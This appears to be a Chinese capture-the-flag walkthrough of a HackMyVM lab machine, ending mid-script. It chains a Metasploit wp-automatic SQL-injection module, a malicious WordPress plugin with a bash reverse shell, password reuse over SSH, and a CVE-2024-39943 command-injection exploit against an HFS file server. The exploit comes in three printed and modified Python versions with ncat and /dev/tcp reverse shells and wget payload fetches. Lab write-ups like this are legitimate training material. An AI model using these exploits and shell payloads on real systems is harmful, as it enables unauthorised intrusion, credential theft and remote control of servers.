 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/57be67fd-8485-495f-b5e9-6eb52af945b7
289
 |
290
 | [!] Title: WordPress Automatic Plugin - AI content generator and auto poster plugin < 3.119.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting
291
 |     Fixed in: 3.119.0
292
 |     References:
293
 |      - https://wpscan.com/vulnerability/d1492e08-59cc-4ae8-ac04-6cf2bfde2898
294
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6247
295
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/95d68a5d-4d0b-4030-a80a-ada31b118af2
296
 |
297
 | The version could not be determined.
298

299
[i] User(s) Identified:
300

301
[+] admin
302
 | Found By: Rss Generator (Passive Detection)
303
 | Confirmed By: Login Error Messages (Aggressive Detection)
304

305
[+] WPScan DB API OK
306
 | Plan: free
307
 | Requests Done (during the scan): 6
308
 | Requests Remaining: 19
309

310
[+] Finished: Fri Jan 23 20:38:34 2026
311
[+] Requests Done: 116303
312
[+] Cached Requests: 22
313
[+] Data Sent: 31.13 MB
314
[+] Data Received: 16.122 MB
315
[+] Memory used: 448.398 MB
316
[+] Elapsed time: 00:02:29

由于Ultimate Member不方便利用，需要尝试利用wp-automatic漏洞

漏洞利用

msfconsole

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# msfconsole
3
Metasploit tip: Use the resource command to run commands from a file
4

5
               .;lxO0KXXXK0Oxl:.
6
           ,o0WMMMMMMMMMMMMMMMMMMKd,
7
        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
8
      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
9
    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
10
   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo
11
  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk
12
 oMMMMMMMMMMx.                    dMMMMMMMMMMx
13
.WMMMMMMMMM:                       :MMMMMMMMMM,
14
xMMMMMMMMMo                         lMMMMMMMMMO
15
NMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;
16
MMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:
17
NMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:
18
xMMMMMMMMMd                        ,0MMMMMMMMMMK;
19
.WMMMMMMMMMc                         'OMMMMMM0,
20
 lMMMMMMMMMMk.                         .kMMO'
21
  dMMMMMMMMMMWd'                         ..
22
   cWMMMMMMMMMMMNxc'.                ##########
23
    .0MMMMMMMMMMMMMMMMWc            #+#    #+#
24
      ;0MMMMMMMMMMMMMMMo.          +:+
25
        .dNMMMMMMMMMMMMo          +#++:++#+
26
           'oOWMMMMMMMMo                +:+
27
               .,cdkO0K;        :+:    :+:
28
                                :::::::+:
29
                      Metasploit
30

31
       =[ metasploit v6.4.69-dev                          ]
32
+ -- --=[ 2529 exploits - 1302 auxiliary - 432 post       ]
33
+ -- --=[ 1678 payloads - 49 encoders - 13 nops           ]
34
+ -- --=[ 9 evasion                                       ]
35

36
Metasploit Documentation: https://docs.metasploit.com/
37

38
msf6 > search wordpress ultimate
39

40
Matching Modules
41
================
42

43
   #  Name                                                    Disclosure Date  Rank    Check  Description
44
   -  ----                                                    ---------------  ----    -----  -----------
45
   0  auxiliary/gather/wp_ultimate_csv_importer_user_extract  2015-02-02       normal  Yes    WordPress Ultimate CSV Importer User Table Extract
46
   1  auxiliary/scanner/http/wp_ultimate_member_sorting_sqli  2024-02-10       normal  No     WordPress Ultimate Member SQL Injection (CVE-2024-1071)
47

48

49
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/http/wp_ultimate_member_sorting_sqli
50

51
msf6 > search wp_automatic
52

53
Matching Modules
54
================
55

56
   #  Name                                              Disclosure Date  Rank       Check  Description
57
   -  ----                                              ---------------  ----       -----  -----------
58
   0  auxiliary/admin/http/wp_automatic_plugin_privesc  2021-09-06       normal     Yes    WordPress Plugin Automatic Config Change to RCE
59
   1  exploit/multi/http/wp_automatic_sqli_to_rce       2024-03-13       excellent  Yes    WordPress wp-automatic Plugin SQLi Admin Creation
60
   2    \_ target: PHP In-Memory                        .                .          .      .
61
   3    \_ target: Unix/Linux Command Shell             .                .          .      .
62
   4    \_ target: Windows Command Shell                .                .          .      .
63

64

65
Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/wp_automatic_sqli_to_rce
66
After interacting with a module you can manually set a TARGET with set TARGET 'Windows Command Shell'
67

68
_member_sorting_sqli) > use exploit/multi/http/wp_automatic_sqli_to_rce
69
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
70
msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > set RHOSTS mamushka.hmv
71
RHOSTS => mamushka.hmv
72
msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > set RPORT 80
73
RPORT => 80
74
msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > set SSL false
75
SSL => false
76
msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > set TARGETURI /
77
TARGETURI => /
78

79
msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > show options
80

81
Module options (exploit/multi/http/wp_automatic_sqli_to_rce):
82

83
   Name       Current Sett  Required  Description
84
              ing
85
   ----       ------------  --------  -----------
86
   EMAIL      shanti.heath  no        Email for the ne
87
              cote@borer-a            w user
88
              rmstrong.exa
89
              mple
90
   PASSWORD   WuuPjjP8sUTT  no        Password for the
91
              68                       new user
92
   Proxies                  no        A proxy chain of
93
                                       format type:hos
94
                                      t:port[,type:hos
95
                                      t:port][...]. Su
96
                                      pported proxies:
97
                                       socks5, socks5h
98
                                      , http, sapni, s
99
                                      ocks4
100
   RHOSTS     mamushka.hmv  yes       The target host(
101
                                      s), see https://
102
                                      docs.metasploit.
103
                                      com/docs/using-m
104
                                      etasploit/basics
105
                                      /using-metasploi
106
                                      t.html
107
   RPORT      80            yes       The target port
108
                                      (TCP)
109
   SSL        false         no        Negotiate SSL/TL
110
                                      S for outgoing c
111
                                      onnections
112
   TARGETURI  /             yes       The base path to
113
                                       the wordpress a
114
                                      pplication
115
   USERNAME   rolando       no        Username to crea
116
                                      te
117
   VHOST                    no        HTTP server virt
118
                                      ual host
119

120

121
Payload options (php/meterpreter/reverse_tcp):
122

123
   Name   Current Setti  Required  Description
124
          ng
125
   ----   -------------  --------  -----------
126
   LHOST  192.168.0.108  yes       The listen address
127
                                   (an interface may b
128
                                   e specified)
129
   LPORT  4444           yes       The listen port
130

131

132
Exploit target:
133

134
   Id  Name
135
   --  ----
136
   0   PHP In-Memory
137

138

139

140
View the full module info with the info, or info -d command.
141

142
msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > exploit
143
[*] Started reverse TCP handler on 192.168.0.108:4444
144
[*] Running automatic check ("set AutoCheck false" to disable)
145
[*] Attempting SQLi test to verify vulnerability...
146
[+] The target is vulnerable. Target is vulnerable to SQLi!
147
[-] Exploit aborted due to failure: unexpected-reply: Failed to log in to WordPress admin.
148
[*] Exploit completed, but no session was created.

最终的预期是反弹shell的，不过当上传payload的时候会失败，因为新版的wordpress是不允许上传php文件

不过好在他成功创建了管理员账户rolando:WuuPjjP8sUTT68

尝试登录一下，可以成功登录

提权

上传恶意插件

我们可以尝试通过添加插件的访问获取反弹shell

[Wordpress - HackTricks](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/wordpress.html?highlight=wordpress↗ plugins#plugin-rce)

wetw0rk/malicious-wordpress-plugin: Simply generates a wordpress plugin that will grant you a reverse shell once uploaded. I recommend installing Kali Linux, as msfvenom is used to generate the payload.↗

或者可以尝试手动写一个恶意php，压缩成zip文件即可

1
❯ vi rev.php
2
<?php
3
/**
4
 * Plugin Name: GetRev
5
 * Version: 10.8.1
6
 * Author: PwnedSauce
7
 * Author URI: http://PwnedSauce.com
8
 * License: GPL2
9
 */
10
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.108/4444 0>&1'")
11
?>
12
❯ zip rev.zip rev.php
13
  adding: rev.php (deflated 14%)

1
(remote) www-data@3ed5ddfe0e0c:/home$ env
2
HISTCONTROL=ignorespace
3
HOSTNAME=3ed5ddfe0e0c
4
PHP_VERSION=8.2.22
5
APACHE_CONFDIR=/etc/apache2
6
PHP_INI_DIR=/usr/local/etc/php
7
GPG_KEYS=39B641343D8C104B2B146DC3F9C39DC0B9698544 E60913E4DF209907D8E30D96659A97C9CF2A795A 1198C0117593497A5EC5C199286AF1F9897469DC
8
PHP_LDFLAGS=-Wl,-O1 -pie
9
PWD=/home
10
APACHE_LOG_DIR=/var/log/apache2
11
LANG=C
12
PHP_SHA256=8566229bc88ad1f4aadc10700ab5fbcec81587c748999d985f11cf3b745462df
13
APACHE_PID_FILE=/var/run/apache2/apache2.pid
14
WORDPRESS_DB_HOST=db
15
PHPIZE_DEPS=autoconf            dpkg-dev               file             g++             gcc             libc-dev                make            pkg-config             re2c
16
TERM=xterm-256color
17
PHP_URL=https://www.php.net/distributions/php-8.2.22.tar.xz
18
APACHE_RUN_GROUP=www-data
19
APACHE_LOCK_DIR=/var/lock/apache2
20
SHLVL=3
21
PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
22
WORDPRESS_DB_PASSWORD=Fukurokuju
23
APACHE_RUN_DIR=/var/run/apache2
24
PS1=$(command printf "\[\033[01;31m\](remote)\[\033[0m\] \[\033[01;33m\]$(whoami)@$(hostname)\[\033[0m\]:\[\033[1;36m\]$PWD\[\033[0m\]\$ ")
25
APACHE_ENVVARS=/etc/apache2/envvars
26
APACHE_RUN_USER=www-data
27
WORDPRESS_DB_USER=matrioska
28
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
29
WORDPRESS_DB_NAME=wordpressdb
30
PHP_ASC_URL=https://www.php.net/distributions/php-8.2.22.tar.xz.asc
31
PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
32
_=/usr/bin/env
33
OLDPWD=/

提权-matrioshka

你是 www-data
环境是 Docker（HOSTNAME=3ed5ddfe0e0c）
数据库账号+密码已经白送到你 env 里
WordPress 是 完整可控态

1
WORDPRESS_DB_HOST=db
2
WORDPRESS_DB_NAME=wordpressdb
3
WORDPRESS_DB_USER=matrioska
4
WORDPRESS_DB_PASSWORD=Fukurokuju

尝试ssh密码复用登录失败了

发现matrioska和靶机题目差了个h，补全

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# ssh matrioshka@192.168.0.105
3
matrioshka@192.168.0.105's password:
4
Linux matrioshka 6.1.0-23-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.99-1 (2024-07-15) x86_64
5

6
The programs included with the Debian GNU/Linux system are free software;
7
the exact distribution terms for each program are described in the
8
individual files in /usr/share/doc/*/copyright.
9

10
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
11
permitted by applicable law.
12
Last login: Thu Aug 22 19:12:21 2024 from 10.0.2.8
13
matrioshka@matrioshka:~$

提权-root

查suid

1
matrioshka@matrioshka:~$ find / -perm -4000 -type f 2>/dev/null
2
/usr/lib/openssh/ssh-keysign
3
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
4
/usr/bin/gpasswd
5
/usr/bin/chsh
6
/usr/bin/umount
7
/usr/bin/passwd
8
/usr/bin/sudo
9
/usr/bin/su
10
/usr/bin/newgrp
11
/usr/bin/chfn
12
/usr/bin/mount

sudo -l

1
matrioshka@matrioshka:~$ sudo -l
2
[sudo] password for matrioshka:
3
Sorry, user matrioshka may not run sudo on matrioshka.

监听端口

1
matrioshka@matrioshka:~$ ss -lntup
2
Netid  State   Recv-Q   Send-Q     Local Address:Port              Peer Address:Port          Process
3
udp    UNCONN  0        0                0.0.0.0:68                     0.0.0.0:*
4
tcp    LISTEN  0        128              0.0.0.0:22                     0.0.0.0:*
5
tcp    LISTEN  0        4096           127.0.0.1:38973                  0.0.0.0:*
6
tcp    LISTEN  0        4096           127.0.0.1:8080                   0.0.0.0:*
7
tcp    LISTEN  0        4096           127.0.0.1:9090                   0.0.0.0:*
8
tcp    LISTEN  0        128                 [::]:22                        [::]:*
9
tcp    LISTEN  0        511                    *:80                           *:*

1
matrioshka@matrioshka:~$ ps aux | grep -E "8080|9090|38973" | grep -v grep
2
root         910  0.4  0.8 1303940 17144 ?       Sl   20:14   0:14 /usr/sbin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 8080 -container-ip 172.18.0.3 -container-port 80
3
root        1527  0.0  0.7 1156220 14960 ?       Sl   20:14   0:00 /usr/sbin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 9090 -container-ip 172.19.0.2 -container-port 80

👉 这不是普通服务，这是：

宿主机 root 把两个 Docker 容器的 Web 服务“只映射到 localhost”

也就是说：

你现在 以 matrioshka 身份
可以直接访问 root 暴露的内部 Docker 管理 Web
不需要 docker 组
不需要 sudo
不需要内核漏洞

这是 HMV 的标准“docker → root”终局设计

目标-Web 服务

不是宿主机了，而是这两个容器里的 Web 服务本身：

本地端口	容器 IP	说明
8080	172.18.0.3	Web 服务 A
9090	172.19.0.2	Web 服务 B

👉** 其中至少一个容器 = root 挂载宿主 /var/run/docker.sock 或敏感目录**

1
matrioshka@matrioshka:~$ curl -v http://127.0.0.1:8080
2
curl -v http://127.0.0.1:9090
3
*   Trying 127.0.0.1:8080...
4
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
5
> GET / HTTP/1.1
6
> Host: 127.0.0.1:8080
7
> User-Agent: curl/7.88.1
8
> Accept: */*
9
>
10
< HTTP/1.1 301 Moved Permanently
11
< Date: Sat, 24 Jan 2026 02:07:48 GMT
12
< Server: Apache/2.4.61 (Debian)
13
< X-Powered-By: PHP/8.2.22
14
< X-Redirect-By: WordPress
15
< Location: http://127.0.0.1/
16
< Content-Length: 0
17
< Content-Type: text/html; charset=UTF-8
18
<
19
* Connection #0 to host 127.0.0.1 left intact
20
*   Trying 127.0.0.1:9090...
21
* Connected to 127.0.0.1 (127.0.0.1) port 9090 (#0)
22
> GET / HTTP/1.1
23
> Host: 127.0.0.1:9090
24
> User-Agent: curl/7.88.1
25
> Accept: */*
26
>
27
< HTTP/1.1 200 OK
28
< Vary: Accept-Encoding
29
< server: HFS 0.52.9 2024-06-11T12:54:37.285Z
30
< etag:
31
< Cache-Control: no-store, no-cache, must-revalidate
32
< Content-Type: text/html; charset=utf-8
33
< Content-Length: 1763
34
< Date: Sat, 24 Jan 2026 02:07:58 GMT
35
< Connection: keep-alive
36
< Keep-Alive: timeout=5
37
<
38
<!DOCTYPE html>
39
<html>
40
  <head>
41

42
                        <title>File server</title>
43
                        <link rel="shortcut icon" href="/favicon.ico?0" />
44

45
                    <script>
46
                    HFS = {
47
    "VERSION": "0.52.9",
48
    "API_VERSION": 8.72,
49
    "SPECIAL_URI": "/~/",
50
    "PLUGINS_PUB_URI": "/~/plugins/",
51
    "FRONTEND_URI": "/~/frontend/",
52
    "session": {
53
        "username": "",
54
        "exp": "2026-01-25T02:07:58.421Z"
55
    },
56
    "plugins": {},
57
    "prefixUrl": "",
58
    "dontOverwriteUploading": true,
59
    "customHtml": {},
60
    "file_menu_on_link": true,
61
    "tile_size": 0,
62
    "sort_by": "name",
63
    "invert_order": false,
64
    "folders_first": true,
65
    "sort_numerics": false,
66
    "theme": "",
67
    "auto_play_seconds": 5,
68
    "lang": {}
69
}
70
                    document.documentElement.setAttribute('ver', '0.52.9')
71
                    </script>
72

73
    <meta charset="utf-8" />
74
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=0" />
75
    <link href="/~/frontend/fontello.css" rel="stylesheet" />
76
    <script type="module" crossorigin src="/~/frontend/assets/index-Uv-vNCsJ.js"></script>
77
    <link rel="stylesheet" crossorigin href="/~/frontend/assets/index-Bnwe3ltN.css">
78
  </head>
79
  <body>
80

81
                    <style>
82
                    :root {
83

84
                    }
85
                    </style>
86

87

88

89
    <noscript>You need to enable JavaScript to run this app.</noscript>
90
    <div id="root"></div>
91
    <script nomodule>document.getElementById('root').innerText = "Please use a newer browser"</script>
92
  </body>
93
</html>
94
* Connection #0 to host 127.0.0.1 left intact

8080 端口
WordPress，返回 301 重定向到 http://127.0.0.1/
说明：只是普通 WordPress，没有直接暴露管理 API 或命令执行接口
目前不能直接从这里拿到 root shell
9090 端口
返回了 HFS 0.52.9 文件服务器（HTTP File Server）
特点：
- 内置 Web 文件管理
- /~/ API 可能存在文件上传或管理接口
- 很可能没有认证（你看到 "username": ""，session 为空）

9090 是 HFS 0.52.9（Rejetto 新版 Node.js 重写）

这不是老的 HFS 2.x（CVE-2014-6287 那一套）
👉 所以：

❌ /~/upload 直传 ≠ 一定存在
❌ /~/exec 这种老接口 ≠ 存在
❌ Metasploit 里 hfs_exec 那个模块 一定打不通

SSH 本地端口转发

1
ssh -L 7777:127.0.0.1:9090 matrioshka@192.168.0.105

尝试利用弱密码去登录，发现凭证就是admin:admin

得知文件服务器是HFS 0.52.9版本

搜寻一下有无版本漏洞

jakabakos/CVE-2024-23692-RCE-in-Rejetto-HFS: Unauthenticated RCE Flaw in Rejetto HTTP File Server (CVE-2024-23692)↗

https://github.com/Y5neKO/Y5_VulnHub/tree/main/HFS/CVE-2024-39943-Poc-main↗

在CVE-2024-23692的POC虽然可以监测到含有漏洞，但无法成功利用

然而利用CVE-2024-39943可以通过身份验证后执行任意命令

CVE-2024-39943

1
✅ 只下载 poc.py
2
wget https://raw.githubusercontent.com/Y5neKO/Y5_VulnHub/main/HFS/CVE-2024-39943-Poc-main/poc.py
3
或用 curl：
4
curl -O https://raw.githubusercontent.com/Y5neKO/Y5_VulnHub/main/HFS/CVE-2024-39943-Poc-main/poc.py
5

6
✅ 只下载 config.yaml
7
wget https://raw.githubusercontent.com/Y5neKO/Y5_VulnHub/main/HFS/CVE-2024-39943-Poc-main/config.yaml
8

9
✅ 下载 hfs-linux.zip
10
这个是二进制，必须 raw 链接，否则会下成 HTML：
11
wget https://raw.githubusercontent.com/Y5neKO/Y5_VulnHub/main/HFS/CVE-2024-39943-Poc-main/hfs-linux.zip
12

13
解压：
14
unzip hfs-linux.zip
15
chmod +x hfs
16

17
✅ 下载 README.md
18
wget https://raw.githubusercontent.com/Y5neKO/Y5_VulnHub/main/HFS/CVE-2024-39943-Poc-main/README.md

1
┌──(web)─(root㉿kali)-[/home/kali/Desktop/tools/CVE-2024-39943-Poc-main]
2
└─# python poc.py
3
Url: http://127.0.0.1:7777/
4
Cookie: hfs_http=eyJ1c2VybmFtZSI6ImFkbWluIiwiaXAiOiIxNzIuMTkuMC4xIiwiX2V4cGlyZSI6MTc2OTMwODkxNTcwMCwiX21heEFnZSI6ODY0MDAwMDB9; hfs_http.sig=QbVN3mahV5vTUOHKnRCKvSPF6kQ
5
Ip: 127.0.0.1
6
Port: 9999
7
Step 1 add vfs
8
Step 2 set permission vfs
9
Step 3 create folder
10
Step 4 execute payload

1
┌──(web)─(root㉿kali)-[/home/kali/Desktop/tools/CVE-2024-39943-Poc-main]
2
└─# cat poc.py
3
import requests as req
4
import base64
5

6
url = input("Url: ")
7
cookie = input("Cookie: ")
8
ip = input("Ip: ")
9
port = input("Port: ")
10

11
headers = {"x-hfs-anti-csrf":"1","Cookie":cookie}
12

13
print("Step 1 add vfs")
14
step1 = req.post(url+"~/api/add_vfs", headers=headers, json={"parent":"/","source":"/tmp"})
15

16
print("Step 2 set permission vfs")
17
step2 = req.post(url+"~/api/set_vfs", headers=headers, json={"uri":"/tmp/","props":{"can_see":None,"can_read":None,"can_list":None,"can_upload":"*","can_delete":None,"can_archive":None,"source":"/tmp","name":"tmp","type":"folder","masks":None}})
18

19
print("Step 3 create folder")
20
command = "ncat {0} {1} -e /bin/bash".format(ip,port)
21
command = command.encode('utf-8')
22
payload = 'poc";python3 -c "import os;import base64;os.system(base64.b64decode(\''+base64.b64encode(command).decode('utf-8')+"'))"
23
step3 = req.post(url+"~/api/create_folder", headers=headers, json={"uri":"/tmp/","name":payload})
24

25
print("Step 4 execute payload")
26
step4 = req.get(url+"~/api/get_ls?path=/tmp/"+payload, headers=headers)

监听端口，然而并不触发

为什么 `ncat -e` 不触发

在这个 HFS 场景里：

RCE 发生在 Node.js child_process.execSync
执行环境是 非交互 shell
ncat -e /bin/bash 很容易因为：
- TTY 不存在
- seccomp / busybox / netcat 变种
- stdout / stderr 被 HFS 吃掉
  👉 直接失败但不报错

修改后的稳定版 PoC 结构（推荐）

✅ 思路

不在脚本里拼命令
只负责：
把 base64 解码后丢给 shell 执行

✅ 代码

1
import requests as req
2

3
url = input("Url: ")
4
cookie = input("Cookie: ")
5
cmd_b64 = input("Base64Cmd: ")
6

7
headers = {
8
    "x-hfs-anti-csrf": "1",
9
    "Cookie": cookie
10
}
11

12
print("[+] Step 1 add vfs")
13
req.post(url + "~/api/add_vfs",
14
         headers=headers,
15
         json={"parent": "/", "source": "/tmp"})
16

17
print("[+] Step 2 set vfs permission")
18
req.post(url + "~/api/set_vfs",
19
         headers=headers,
20
         json={
21
             "uri": "/tmp/",
22
             "props": {
23
                 "can_upload": "*",
24
                 "source": "/tmp",
25
                 "name": "tmp",
26
                 "type": "folder"
27
             }
28
         })
29

30
print("[+] Step 3 create malicious folder")
31

32
payload = (
33
    'poc";'
34
    'python3 -c "import os,base64;'
35
    'os.system(base64.b64decode(\'%s\').decode())'
36
    '"'
37
) % cmd_b64
38

39
req.post(url + "~/api/create_folder",
40
         headers=headers,
41
         json={"uri": "/tmp/", "name": payload})
42

43
print("[+] Step 4 trigger execution")
44
req.get(url + "~/api/get_ls?path=/tmp/" + payload,
45
        headers=headers)
46

47
print("[+] Done")

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# echo 'bash -i >& /dev/tcp/192.168.0.108/9999 0>&1' |base64
3
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA4Lzk5OTkgMD4mMQo=

1
┌──(web)─(root㉿kali)-[/home/kali/Desktop/tools/CVE-2024-39943-Poc-main]
2
└─# python new_poc.py
3
Url: http://127.0.0.1:7777/
4
Cookie: hfs_http=eyJ1c2VybmFtZSI6ImFkbWluIiwiaXAiOiIxNzIuMTkuMC4xIiwiX2V4cGlyZSI6MTc2OTMwODkxNTcwMCwiX21heEFnZSI6ODY0MDAwMDB9; hfs_http.sig=QbVN3mahV5vTUOHKnRCKvSPF6kQ
5
Base64Cmd: YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA4Lzk5OTkgMD4mMQo=
6
[+] Step 1 add vfs
7
[+] Step 2 set vfs permission
8
[+] Step 3 create malicious folder
9
[+] Step 4 trigger execution
10
[+] Done

直接反弹shell失败了

1
matrioshka@matrioshka:/tmp$ ip a
2
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
3
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
4
    inet 127.0.0.1/8 scope host lo
5
       valid_lft forever preferred_lft forever
6
    inet6 ::1/128 scope host noprefixroute
7
       valid_lft forever preferred_lft forever
8
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
9
    link/ether 08:00:27:41:3c:f7 brd ff:ff:ff:ff:ff:ff
10
    inet 192.168.0.105/24 brd 192.168.0.255 scope global dynamic enp0s3
11
       valid_lft 4077sec preferred_lft 4077sec
12
    inet6 fe80::a00:27ff:fe41:3cf7/64 scope link
13
       valid_lft forever preferred_lft forever
14
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
15
    link/ether 02:42:f3:47:75:e8 brd ff:ff:ff:ff:ff:ff
16
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
17
       valid_lft forever preferred_lft forever
18
5: br-1f21cf17cc68: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
19
    link/ether 02:42:66:a5:ea:28 brd ff:ff:ff:ff:ff:ff
20
    inet 172.18.0.1/16 brd 172.18.255.255 scope global br-1f21cf17cc68
21
       valid_lft forever preferred_lft forever
22
    inet6 fe80::42:66ff:fea5:ea28/64 scope link
23
       valid_lft forever preferred_lft forever
24
9: veth6369dce@if8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-1f21cf17cc68 state UP group default
25
    link/ether d2:a8:b2:77:27:52 brd ff:ff:ff:ff:ff:ff link-netnsid 2
26
    inet6 fe80::d0a8:b2ff:fe77:2752/64 scope link
27
       valid_lft forever preferred_lft forever
28
11: veth854363d@if10: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-1f21cf17cc68 state UP group default
29
    link/ether 06:55:63:ea:7e:e6 brd ff:ff:ff:ff:ff:ff link-netnsid 1
30
    inet6 fe80::455:63ff:feea:7ee6/64 scope link
31
       valid_lft forever preferred_lft forever
32
12: br-457d4131991d: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
33
    link/ether 02:42:9e:d7:38:7e brd ff:ff:ff:ff:ff:ff
34
    inet 172.19.0.1/16 brd 172.19.255.255 scope global br-457d4131991d
35
       valid_lft forever preferred_lft forever
36
    inet6 fe80::42:9eff:fed7:387e/64 scope link
37
       valid_lft forever preferred_lft forever
38
14: veth1f5b280@if13: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-457d4131991d state UP group default
39
    link/ether 0e:dd:18:f4:8e:14 brd ff:ff:ff:ff:ff:ff link-netnsid 3
40
    inet6 fe80::cdd:18ff:fef4:8e14/64 scope link
41
       valid_lft forever preferred_lft forever

1️⃣ 宿主真实网卡

1
enp0s3 → 192.168.0.105/24

这是 你 SSH 进来的那台 VM 的对外 IP

2️⃣ Docker bridge（重点）

你有 三个 bridge：

1
docker0          → 172.17.0.1
2
br-1f21cf17cc68  → 172.18.0.1
3
br-457d4131991d  → 172.19.0.1   ← ★★★

而你前面已经确认过：

1
docker-proxy
2
container-ip: 172.19.0.2

👉 HFS 就跑在 **br-457d4131991d** 这个网络里

也就是说：

💥 payload 实际执行位置 = 172.19.0.2 这个容器

1
matrioshka@matrioshka:~$ vi rev.sh
2
/bin/bash -i >& /dev/tcp/172.19.0.1/4444 0>&1
3
matrioshka@matrioshka:~$ python3 -m http.server
4
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
5
172.19.0.2 - - [09/Mar/2025 09:36:58] "GET /rev.sh HTTP/1.1" 200 -

1
wget 172.17.0.1:8000/rev.sh -O /tmp/rev.sh
2
┌──(web)─(root㉿kali)-[/home/kali]
3
└─# echo 'wget 172.17.0.1:8000/rev.sh -O /tmp/rev.sh' |base64
4
d2dldCAxNzIuMTcuMC4xOjgwMDAvcmV2LnNoIC1PIC90bXAvcmV2LnNoCg==

1
┌──(web)─(root㉿kali)-[/home/kali/Desktop/tools/CVE-2024-39943-Poc-main]
2
└─# python new_poc.py
3
Url: http://127.0.0.1:7777/
4
Cookie: hfs_http=eyJ1c2VybmFtZSI6ImFkbWluIiwiaXAiOiIxNzIuMTkuMC4xIiwiX2V4cGlyZSI6MTc2OTMxMDcxNTczNiwiX21heEFnZSI6ODY0MDAwMDB9; hfs_http.sig=44aOyFx6SzoAbSudgg_CfC17Fww
5
Base64Cmd: d2dldCAxNzIuMTcuMC4xOjgwMDAvcmV2LnNoIC1PIC90bXAvcmV2LnNoCg==
6
[+] Step 1 add vfs
7
[+] Step 2 set vfs permission
8
[+] Step 3 create malicious folder
9
[+] Step 4 trigger execution
10
[+] Done

还是没成功

修改代码

1
#!/usr/bin/env python3
2
"""
3
CVE-2024-39943 HFS RCE Exploit - Interactive Mode
4
"""
5

6
import requests as req
7
import base64
8
import urllib.parse
9

10
# ========== 配置区域 ==========
11
url = input("Url [http://127.0.0.1:7777/]: ") or "http://127.0.0.1:7777/"
12
cookie = input("Cookie: ")
13
reverse_ip = input("Reverse IP [172.17.0.1]: ") or "172.17.0.1"
14
reverse_port = input("Reverse Port [4444]: ") or "4444"
15
http_port = input("HTTP Port [8888]: ") or "8888"
16

17
if not url.endswith("/"):
18
    url += "/"
19

20
headers = {"x-hfs-anti-csrf": "1", "Cookie": cookie}
21

22
def exec_cmd(cmd):
23
    """执行任意命令"""
24
    # 添加VFS
25
    req.post(url + "~/api/add_vfs", headers=headers,
26
             json={"parent": "/", "source": "/tmp"})
27
    # 设置权限
28
    req.post(url + "~/api/set_vfs", headers=headers, json={
29
        "uri": "/tmp/",
30
        "props": {"can_see": None, "can_read": None, "can_list": None,
31
                  "can_upload": "*", "can_delete": None, "can_archive": None,
32
                  "source": "/tmp", "name": "tmp", "type": "folder", "masks": None}
33
    })
34
    # 构造payload
35
    cmd_b64 = base64.b64encode(cmd.encode('utf-8')).decode('utf-8')
36
    payload = f'poc";python3 -c "import os;import base64;os.system(base64.b64decode(\'{cmd_b64}\'))"'
37
    req.post(url + "~/api/create_folder", headers=headers,
38
             json={"uri": "/tmp/", "name": payload})
39
    req.get(url + f"~/api/get_ls?path=/tmp/{urllib.parse.quote(payload)}", headers=headers)
40
    print(f"[+] Executed: {cmd}")
41

42
print("\n" + "="*50)
43
print("HFS RCE Interactive Shell")
44
print("="*50)
45
print("Commands:")
46
print("  1 or download  - 下载reverse_shell.sh")
47
print("  2 or shell     - 执行反弹shell")
48
print("  3 or custom    - 执行自定义命令")
49
print("  help           - 显示准备步骤")
50
print("  exit           - 退出")
51
